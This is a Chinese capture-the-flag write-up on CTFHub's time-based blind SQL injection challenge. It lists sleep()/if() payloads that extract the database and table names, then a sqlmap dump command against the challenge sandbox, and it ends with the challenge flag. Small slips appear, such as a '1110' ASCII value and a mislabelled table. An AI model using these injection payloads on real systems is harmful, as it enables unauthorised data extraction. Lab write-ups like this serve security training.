CTFHUB-SQL注入-时间盲注

考点
SQL时间盲注
时间盲注攻击
利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用，通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。
分析过程

1 and if(length(database())=5,sleep(3),1)
1 and if(length(database())=4,sleep(3),1)
1 and if(length(database())=3,sleep(3),1)

页面3秒钟后才响应，说明数据库名称长度=4
猜解数据库名称

1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)	ascii(s)=115

1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)	ascii(q)=113

1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=1110,sleep(3),1)	ascii(l)=110

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	ascii(i)=105

......

不断调整ASCII码的范围逐渐得到数据库名称为sqli
sqli数据库中表的数量

1 and if((select count(table_name) from information_schema.tables
 where table_schema=database())=2,sleep(3),1)

页面3秒后响应，说明有两张表

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
  ascii(n)=110

3秒后响应，说明第一张表的第一个字母为n
依次得到表名为news

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
  ascii(f)=102

3秒后响应，说明第一张表的第一个字母为f
依次得到表名为flag
要挨个试出来工作量有点大 ，上sqlmap
playload

sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.
ctfhub.com:10080/?id=1" -D sqli -T flag --columns --dump

得到flag

ctfhub{9bc0b66282f7a71f2ca1ebbc}